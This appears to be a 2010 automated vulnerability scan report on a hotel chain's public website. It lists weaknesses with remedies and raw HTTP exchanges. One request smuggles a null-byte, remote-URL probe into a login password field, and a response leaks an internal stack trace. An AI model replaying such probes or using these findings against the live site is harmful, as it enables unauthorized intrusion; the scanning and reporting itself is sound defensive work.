<!-- TOPNAV INC START -->
<div class="navtop">
<table width="923" height="70" cellspacing="0" cellpadding="0" border="0">
<tr><td width="144"><a href="/index.aspx"><img src="../assets/logo.gif" width="144" height="50" border="0" /></a></td>
<td width="779">


<script language="Javascript">
<!--
function ClearSearchBox(theText)
{
if (theText.value == theText.defaultValue) theText.value = ""
}
//-->
</script>

<script src="/_js/popup-window.js" type="text/javascript"></script>
<script src="/_js/preload.js" type="text/javascript"></script>
<link href="/_css/topnav.css" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/_css/topnav-ie.css" rel="stylesheet" type="text/css" /><![endif]-->

<table width="780" height="38" cellpadding="0" cellspacing="0" border="0" id="primary-nav">
<tr>
<td width="89"><a href="/reservations/hotel-reservations.aspx" id="nav_reservations"><img src="/images-nav/navtop-rese-off.png" alt="Reservations" name="Reservations" width="89" height="38" border="0" id="Reservations" /></a></td>
<td width="80"><ul id="primary-nav">
<li class="menuparent"><a href="/promotions/promotions.aspx"><img src="/images-nav/navtop-prom-on.png" alt="Promotions" name="Promotions" width="80" height="38" border="0" id="Promotions" onmouseover='this.src="/images-nav/navtop-prom-on.png"' onmouseout='this.src="/images-nav/navtop-prom-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/promotions/best-rate-guarantee.aspx">Best Rate Guarantee<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="http://travel.wwte1.com/pubspec/scripts/eap.asp?goto=eta&eapid=11516-30001&lang=1033&ovrd=3" target="_blank">Air/Car/Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hotel-packages.aspx">Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/aaa.aspx">AAA Members<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/summer-playground.aspx">Your Summer Playground<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/winter-spark.aspx">Winter Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/holiday-party-offer.aspx">Holiday Party Offer<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/dollar-deals.aspx">Just $1 More Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/government-rates.aspx">Government Rates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/sweet-tax-relief.aspx">Sweet Tax Relief<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/sunday-sleep-in.aspx">Sunday Sleep-In<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/rub-the-one-youre-with.aspx">Rub the One You're With<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/ride-the-rails.aspx">Ride the Rails<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/we-got-your-bag.aspx">We've Got Your Bag<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hybrid-parking.aspx">Hybrid Parking Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/programs/lgbt-all-play.aspx">LGBT - All Play, No Work<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/KimptonReservator">The Kimpton Reservator&trade;<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="#" onclick="popup('http://www.gifttracker.com/cgi-bin/default.asp?COID=1607')">Gift Certificates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/intouch/EMLogin.aspx">Receive Newsletters &amp; Offers<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/intouch/EMGuestUpdate.aspx">Manage My Newsletters<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
</ul>
</li>
</ul>
</li>
</ul></td>
<td width="52"><ul id="primary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx"><img src="/images-nav/navtop-hote-off.png" alt="Hotels" name="Hotels" width="52" height="38" border="0" id="Hotels" onmouseover='this.src="/images-nav/navtop-hote-on.png"' onmouseout='this.src="/images-nav/navtop-hote-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx">All Hotels<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/locations.aspx">Cities<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels-alexandria.aspx">Alexandria<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-arlington.aspx">Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-aspen.aspx">Aspen<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-atlanta.aspx">Atlanta<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-baltimore.aspx">Baltimore<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-boston.aspx">Boston/Cambridge<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-chicago.aspx">Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-dallas.aspx">Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-denver.aspx">Denver<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-losangeles.aspx">Los Angeles<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-miami.aspx">Miami<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-newyorkcity.aspx">New York City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-philadelphia.aspx">Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-portland.aspx">Portland<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-saltlakecity.aspx">Salt Lake City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sandiego.aspx">San Diego<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanfrancisco.aspx">San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-scottsdale.aspx">Scottsdale<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-seattle.aspx">Seattle<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanjose.aspx">Silicon Valley/Cupertino<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/hotels/hotels-vancouver.aspx">Vancouver, B.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/hotels/hotels-verobeach.aspx">Vero Beach<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-washingtondc.aspx">Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent"><a href="/hotels/hotel-palomars.aspx">Hotel Palomar<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-arlington/">Hotel Palomar Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-atlanta-midtown/">Hotel Palomar Atlanta-Midtown<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-chicago/">Hotel Palomar Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-dallas/">Hotel Palomar Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-los-angeles-westwood/">Hotel Palomar LA-Westwood<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-philadelphia/">Hotel Palomar Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-san-francisco/">Hotel Palomar San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-washington-dc/">Hotel Palomar Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent">&l..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /development/development-standards-legal.html

/development/development-standards-legal.html CONFIRMED

http://www.kimptonhotels.com/development/development-standards-legal.html

Identified Cookie

ASPSESSIONIDAQQBQDDR

Request

GET /development/development-standards-legal.html HTTP/1.1
Referer: http://www.kimptonhotels.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:00:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2912
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Kimpton Standards Login</title><link rel="stylesheet" type="text/css" href="../_css/global.css"><style type="text/css"><!--body { background: #FFFFFF;}--></style></head><body><table width="600" cellspacing="0" cellpadding="0" border="0" class="kim11"><tr><td><img src="../assets/logo.gif" width="144" height="50" alt=""><br /><br />In connection with certain business negotiations between you and Kimpton Hotel & Restaurant Group ("Kimpton"), you have requested access to certain documents containing information that was developed by Kimpton and which Kimpton considers to be non-public, confidential and proprietary in nature ("Information"). In consideration of Kimpton disclosing this Information to you, you agree that the Information shall be kept strictly confidential and shall be used only for the purpose of these business negotiations. You agree that the Information shall not be disclosed, in whole or part, by you or any of your agents, representatives, consultants or employees ("Representatives") and you agree that you and your Representatives shall not reproduce, disseminate or otherwise memorialize the Information. If you provide the Information to any of your Representatives, you agree that you shall inform them of the terms described herein and you agree to be responsible for any breach of these terms by you or your Representatives and shall defend and indemnify Kimpton from and against any claims, demands, liabilities, losses, causes of action, damages, and costs and expenses (including reasonable attorneys fees) arising from or related to any breach of the terms described herein. The prevailing party in any legal proceeding pertaining to these terms or any unauthorized use of the Information shall be entitled to recover all costs and expenses incurred by such party in such proceeding, including, without limitation, reasonable attorneys' fees.<br /><br />You acknowledge and agree that Kimpton, nor any of its agents, representatives, consultants or employees, makes any express or implied representation or warranty of any kind or nature as to the accuracy or completeness of the Information none of the foregoing shall have any liability or responsibility of any kind or nature to you or any of your Representatives resulting from the provision of or use of the Information. If you or your Representatives become legally compelled to disclose the Information, you shall promptly notify Kimpton in writing so that Kimpton may seek a protective order or waive compliance with the terms herein.<br /><br />By accessing this Information you acknowledge that you are agreeing to the above terms and conditions.<br /><br /> <div align="center"><a href="login.aspx">I agree</a> | <a href="http://www.kimptonhotels.com">I disagree</a></td></tr></table></body></html>
ASP.NET Stack Trace Disclosure

ASP.NET Stack Trace Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET stack trace data in the HTTP response.

Impact

An attacker can obtain information such as:
  • ASP.NET version.
  • Physical file path of Temporary ASP.NET Files
  • Information about the generated exception and possibly source code, SQL queries, etc.
This information can help an attacker to gain more information and to potentially focus the development of further attacks for the target system.

Remedy

Apply following changes on your web.config file to prevent information leakage by applying custom error pages.
<System.Web>
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /intouch/InTouchSignInProxy.aspx

/intouch/InTouchSignInProxy.aspx

http://www.kimptonhotels.com/intouch/InTouchSignInProxy.aspx

Parameters

Parameter Type Value
strPass POST http://netsparker.com/n? .aspx
strUserID POST 3

Request

POST /intouch/InTouchSignInProxy.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=ie4q1t55cekpb0jb4subxy45; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Content-Length: 52
Accept-Encoding: gzip, deflate

strPass=http://netsparker.com/n?%00.aspx&strUserID=3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:48:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 519


System.Net.WebException: The request failed with HTTP status 400: Bad Request.
at System.Web.Services.Protocols.SoapHttpClientProtocol.ReadResponse(SoapClientMessage message, WebResponse response, Stream responseStream, Boolean asyncCall)
at System.Web.Services.Protocols.SoapHttpClientProtocol.Invoke(String methodName, Object[] parameters)
at GuestWareService.GWETPWEB.LogonProfile(String parstrLogin, String parstrPassword)
at ASP.intouch_intouchsigninproxy_aspx.Page_Load(Object sender, EventArgs e)
ViewState is not Encrypted

ViewState is not Encrypted

1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>      

Remedy References

- /intouch/EMLogin.aspx

/intouch/EMLogin.aspx

http://www.kimptonhotels.com/intouch/EMLogin.aspx

ViewState Version

.NET Framework 2.x

Request

GET /intouch/EMLogin.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 77693



<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton Email Program</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The Kimpton InTouch guest loyalty reward program offers thank-you rewards, personalized room preferences and elite member options.">
<meta name="keywords" content="guest loyalty, guest loyalty programs, hotel rewards, hotel points, travel rewards, frequent traveler rewards, elite inner circle">
<meta name="WT.sp" content="KC-Corp">
<noscript>
<img border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/DCSKIoc2rNH8I36lrbe6wexE5_5B9O/njs.gif?dcsuri=/nojavascript&WT.js=No">
</noscript>
<script language="JavaScript" src="../_js/webtrends.js"></script>
<script type="text/javascript" src="../_js/menucontrol.js"></script>
<script type="text/javascript" src="../_js/snipe_control.js"></script>
<script src="../_js/IEHoverPseudo.js" language="javascript"></script>
<script src="../_js/SpryMenuBar.js" type="text/javascript"></script>
<script src="../_js/rollover.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="../_css/global.css">

<script type="text/javascript">
<!--

// return the value of the radio button that is checked
// return an empty string if none are checked, or
// there are no radio buttons
function getCheckedValue( groupname )
{

var elem = document.getElementById('Form1').elements;
for(var i = 0; i < elem.length; i++)
{
if ( elem[i].name == "passrequired")
{
if ( elem[i].checked == true)
{
return elem[i].value;
break;
}
}

}
return "";

}


function doTogglePassValidation( setFlag)
{
if ( setFlag == false)
{
ValidatorEnable(document.getElementById('RequiredFieldValidator2'), false);
}
else
{
ValidatorEnable(document.getElementById('RequiredFieldValidator2'), true);
}

}

function SyncPasswordValidation()
{

//alert(" Checked value is: " + getCheckedValue('passrequired') );

//If No password checked, turn off password validation

if ( getCheckedValue('passrequired') == "rbPassNo")
{
ValidatorEnable(document.getElementById('RequiredFieldValidator2'), false);
}
else
{
//Were gonna assume they are on by default, if this fires is shows the message, dont want that
// ValidatorEnable(document.getElementById('RequiredFieldValidator2'), true);
}

}

//-->
</script>
</head>
<body onLoad="SyncPasswordValidation();IEHoverPseudo()">
<center>
<!-- INTOUCH INC-->
<div class="intouchinc"><DIV id=intouch_menu style="BORDER-RIGHT: #4e4d94 0px; PADDING-RIGHT: 0px; BORDER-TOP: #4e4d94 0px; PADDING-LEFT: 0px; Z-INDEX: 10; LEFT: 0px; PADDING-BOTTOM: 0px; BORDER-LEFT: #4e4d94 0px; PADDING-TOP: 0px; BORDER-BOTTOM: #4e4d94 0px; POSITION: relative; TOP: -2px"><span class='kim10' id='kimwhite'><strong></strong> &nbsp;<img src='assets/clear.gif' width='1' height='11' border='0'>&nbsp; </span><span class='kim10'>&nbsp;</span></SPAN></DIV>


</div>
<div class="corner-btmlft"><div class="corner-btmrgt"><div class="corner-toplft"><div class="corner-toprgt">
<!-- TOPNAV INC START -->
<div class="navtop">
<table width="923" height="70" cellspacing="0" cellpadding="0" border="0">
<tr><td width="144"><a href="/index.aspx"><img src="../assets/logo.gif" width="144" height="50" border="0" /></a></td>
<td width="779">


<script language="Javascript">
<!--
function ClearSearchBox(theText)
{
if (theText.value == theText.defaultValue) theText.value = ""
}
//-->
</script>

<script src="/_js/popup-window.js" type="text/javascript"></script>
<script src="/_js/preload.js" type="text/javascript"></script>
<link href="/_css/topnav.css" rel="stylesheet" type="text/css" />
<!--[if IE]><link href="/_css/topnav-ie.css" rel="stylesheet" type="text/css" /><![endif]-->

<table width="780" height="38" cellpadding="0" cellspacing="0" border="0" id="primary-nav">
<tr>
<td width="89"><a href="/reservations/hotel-reservations.aspx" id="nav_reservations"><img src="/images-nav/navtop-rese-off.png" alt="Reservations" name="Reservations" width="89" height="38" border="0" id="Reservations" /></a></td>
<td width="80"><ul id="primary-nav">
<li class="menuparent"><a href="/promotions/promotions.aspx"><img src="/images-nav/navtop-prom-off.png" alt="Promotions" name="Promotions" width="80" height="38" border="0" id="Promotions" onmouseover='this.src="/images-nav/navtop-prom-on.png"' onmouseout='this.src="/images-nav/navtop-prom-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/promotions/best-rate-guarantee.aspx">Best Rate Guarantee<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="http://travel.wwte1.com/pubspec/scripts/eap.asp?goto=eta&eapid=11516-30001&lang=1033&ovrd=3" target="_blank">Air/Car/Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hotel-packages.aspx">Hotel Packages<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/aaa.aspx">AAA Members<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/summer-playground.aspx">Your Summer Playground<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/winter-spark.aspx">Winter Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/holiday-party-offer.aspx">Holiday Party Offer<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/dollar-deals.aspx">Just $1 More Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/government-rates.aspx">Government Rates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/promotions/sweet-tax-relief.aspx">Sweet Tax Relief<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/sunday-sleep-in.aspx">Sunday Sleep-In<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/promotions/rub-the-one-youre-with.aspx">Rub the One You're With<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/promotions/ride-the-rails.aspx">Ride the Rails<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/we-got-your-bag.aspx">We've Got Your Bag<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/promotions/hybrid-parking.aspx">Hybrid Parking Promotion<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/programs/lgbt-all-play.aspx">LGBT - All Play, No Work<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<!--<li class="menuparent"><a href="/KimptonReservator">The Kimpton Reservator&trade;<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="#" onclick="popup('http://www.gifttracker.com/cgi-bin/default.asp?COID=1607')">Gift Certificates<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/intouch/EMLogin.aspx">Receive Newsletters &amp; Offers<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/intouch/EMGuestUpdate.aspx">Manage My Newsletters<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
</ul>
</li>
</ul>
</li>
</ul></td>
<td width="52"><ul id="primary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx"><img src="/images-nav/navtop-hote-off.png" alt="Hotels" name="Hotels" width="52" height="38" border="0" id="Hotels" onmouseover='this.src="/images-nav/navtop-hote-on.png"' onmouseout='this.src="/images-nav/navtop-hote-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx">All Hotels<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/locations.aspx">Cities<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels-alexandria.aspx">Alexandria<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-arlington.aspx">Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-aspen.aspx">Aspen<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-atlanta.aspx">Atlanta<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-baltimore.aspx">Baltimore<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-boston.aspx">Boston/Cambridge<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-chicago.aspx">Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-dallas.aspx">Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-denver.aspx">Denver<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-losangeles.aspx">Los Angeles<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-miami.aspx">Miami<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-newyorkcity.aspx">New York City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-philadelphia.aspx">Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-portland.aspx">Portland<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-saltlakecity.aspx">Salt Lake City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sandiego.aspx">San Diego<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanfrancisco.aspx">San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-scottsdale.aspx">Scottsdale<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-seattle.aspx">Seattle<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanjose.aspx">Silicon Valley/Cupertino<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/hotels/hotels-vancouver.aspx">Vancouver, B.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/hotels/hotels-verobeach.aspx">Vero Beach<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-washingtondc.aspx">Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent"><a href="/hotels/hotel-palomars.aspx">Hotel Palomar<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-arlington/">Hotel Palomar Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-atlanta-midtown/">Hotel Palomar Atlanta-Midtown<img src="/assets/clear.gif" width="10" height=&..
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /promotions/

/promotions/ CONFIRMED

http://www.kimptonhotels.com/promotions/

Request

GET /promotions/ HTTP/1.1
Referer: http://www.kimptonhotels.com/promotions/promotions.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 06 Oct 2010 01:57:34 GMT


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
MySQL 5 Database Identified

MySQL 5 Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /development/login.aspx

/development/login.aspx CONFIRMED

http://www.kimptonhotels.com/development/login.aspx

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
